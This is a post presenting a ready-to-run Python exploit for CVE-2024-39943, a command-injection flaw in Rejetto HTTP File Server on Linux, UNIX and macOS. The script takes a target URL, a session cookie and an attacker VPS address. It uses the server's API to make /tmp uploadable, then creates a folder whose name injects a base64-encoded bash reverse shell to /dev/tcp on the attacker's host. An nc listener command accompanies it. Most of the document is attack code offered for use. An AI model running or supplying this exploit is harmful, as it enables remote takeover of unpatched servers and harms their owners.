
Remote RCE, Rejetto HFS (aka HTTP File Server), CVE-2024-39943

blackhunt


CVE-2024-39943 Exploit



0x01 Vulnerability description

Rejetto HFS (aka HTTP File Server) versions earlier than 0.52.10 on Linux, UNIX, and macOS contain a vulnerability that allows remote authenticated users to execute operating system commands if they have upload permissions. The cause is that the df command is run through a shell: the code uses execSync from Node.js's child_process module instead of spawnSync, so the command line is built as a string and interpreted by the shell.


0x02 Scope of influence

Rejetto HTTP File Server 3 versions earlier than 0.52.10 on Linux, UNIX and macOS contain the vulnerability.


0x03 Vulnerability Exploitation

The attacking machine sets up a listening port


Bash:
nc -lvvp 9999


Execute the script

Bash:
python3 CVE-2024-39943.py

Github : https://github.com/A-little-dragon/CVE-2024-39943-Exploit


Python:
import base64
from datetime import datetime
import requests
import colorama


def showMsg():
    colorama.init()
    return (colorama.Fore.RED + rf"""
  ______     _______     ____   ___ ____  _  _        _____ ___   ___  _  _    _____
 / ___\ \   / / ____|   |___ \ / _ \___ \| || |      |___ // _ \ / _ \| || |  |___ /
| |    \ \ / /|  _| _____ __) | | | |__) | || |_ _____ |_ \ (_) | (_) | || |_   |_ \
| |___  \ V / | |__|_____/ __/| |_| / __/|__   _|_____|__) \__, |\__, |__   _| ___) |
 \____|  \_/  |_____|   |_____|\___/_____|  |_|      |____/  /_/   /_/   |_|  |____/
 
                                                            {colorama.Fore.CYAN}By:{colorama.Fore.MAGENTA}A-little-dragon
                                                            {colorama.Fore.CYAN}Team:{colorama.Fore.MAGENTA}TracelessSec
                                                            {colorama.Fore.CYAN}Github:{colorama.Fore.MAGENTA}https://github.com/A-little-dragon
    """ + "\033[0m")


def GetTime():
    return datetime.strftime(datetime.now(), '%Y-%m-%d %H:%M:%S')


def start():
    print(showMsg())
    url = input("Set Target URL > ")
    cookie = input("Set Target Cookie > ")
    vps_ip = input("Set VPS IP > ")
    vps_port = input("Set VPS PORT > ")
    headers = {"x-hfs-anti-csrf": "1", "Cookie": cookie}
    print(f"[*] {GetTime()} Start executing the attack program!")
    try:
        requests.post(url=url + "~/api/add_vfs", headers=headers, json={"parent": "/", "source": "/tmp"})
        print(f"[+] {GetTime()} Endpoint add_vfs executed successfully!")
        requests.post(url=url + "~/api/set_vfs", headers=headers, json={"uri": "/tmp/",
                                                                        "props": {"can_see": None, "can_read": None,
                                                                                  "can_list": None, "can_upload": "*",
                                                                                  "can_delete": None,
                                                                                  "can_archive": None,
                                                                                  "source": "/tmp", "name": "tmp",
                                                                                  "type": "folder", "masks": None}})
        print(f"[+] {GetTime()} Endpoint set_vfs executed successfully!")
        command = f"bash -i >& /dev/tcp/{vps_ip}/{vps_port} 0>&1"
        payload = 'poc";python3 -c "import os;import base64;os.system(base64.b64decode(\'' + base64.b64encode(
            command.encode()).decode() + '\'))'
        requests.post(url=url + "~/api/create_folder", headers=headers, json={"uri": "/tmp/", "name": payload})
        print(f"[+] {GetTime()} Endpoint create_folder executed successfully!")
        print(f"[*] {GetTime()} The attack is completed, please check the attack results yourself!")
        requests.put(url=url + "/tmp/" + payload + "/123.txt", headers=headers, data="aaaaaaa")
    except Exception as e:
        print(f"[-] {GetTime()} The attack failed! wrong reason:", e)


if __name__ == '__main__':
    start()

